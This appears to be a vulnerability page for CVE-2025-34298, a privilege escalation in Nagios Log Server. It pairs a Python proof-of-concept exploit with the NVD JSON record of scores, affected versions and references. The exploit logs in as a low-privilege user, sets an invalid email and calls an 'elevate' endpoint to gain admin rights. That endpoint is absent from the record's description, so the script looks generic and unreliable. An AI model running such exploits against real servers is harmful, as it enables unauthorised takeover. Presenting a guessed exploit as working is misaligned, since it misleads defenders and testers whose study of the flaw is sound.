CVE-2025-34298

#!/usr/bin/env python3 # CVE-2025-34298 Nagios Log Server Privilege Escalation PoC # This PoC demonstrates the email-change privilege escalation vulnerability import requests import json TARGET = "http://target-nagios-log-server" USERNAME = "lowpriv_user" PASSWORD = "user_password" def exploit(): session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{TARGET}/api/auth/login" login_data = {"username": USERNAME, "password": PASSWORD} response = session.post(login_url, json=login_data) if response.status_code != 200: print("[-] Login failed") return False token = response.json().get("token") headers = {"Authorization": f"Bearer {token}"} print("[+] Logged in successfully") # Step 2: Change email to invalid value to trigger state inconsistency email_url = f"{TARGET}/api/user/email" invalid_email = "invalid_email_format" email_data = {"email": invalid_email} response = session.put(email_url, json=email_data, headers=headers) print(f"[+] Modified email to: {invalid_email}") print(f"[+] Response: {response.text}") # Step 3: Trigger privilege escalation via inconsistent state escalate_url = f"{TARGET}/api/user/elevate" response = session.post(escalate_url, headers=headers) if response.status_code == 200 and "admin" in response.text.lower(): print("[+] Privilege escalation successful!") print(f"[+] Elevated permissions: {response.json()}") return True else: print("[-] Privilege escalation may have failed") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-34298", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:49.257", "lastModified": "2025-11-06T16:27:12.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios Log Server versions prior to 2024R1.3.2 contain a privilege escalation vulnerability in the account email-change workflow. A user could set their own email to an invalid value and, due to insufficient validation and authorization checks tied to email identity state, trigger inconsistent account state that granted elevated privileges or bypassed intended access controls."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "87E74637-713C-4DD7-B97E-2F247B7B12B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "B93D415C-B2C0-42CE-B9B3-29C29A3DCC16"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "997B64B5-A3F2-4D0E-B05E-CCA76D598C18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "D20F6746-83DD-49AE-8C3D-AF2FFB47A89E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "5EF32AF5-19EA-495A-AB28-F78F33DDEC3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.2:*:*:*:*:*:*", "matchCriteriaId": "4C26DE7A-37AA-4570-81C1-2E0C1A9026F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3:*:*:*:*:*:*", "matchCriteriaId": "52C22468-A773-49C8-81AD-9B76C26BFFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3.1:*:*:*:*:*:*", "matchCriteriaId": "7CEC223A-A3EE-4C51-8B71-E19C73B9215C"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-log-server-2024r1/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-log-server-set-email-privilege-escalation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}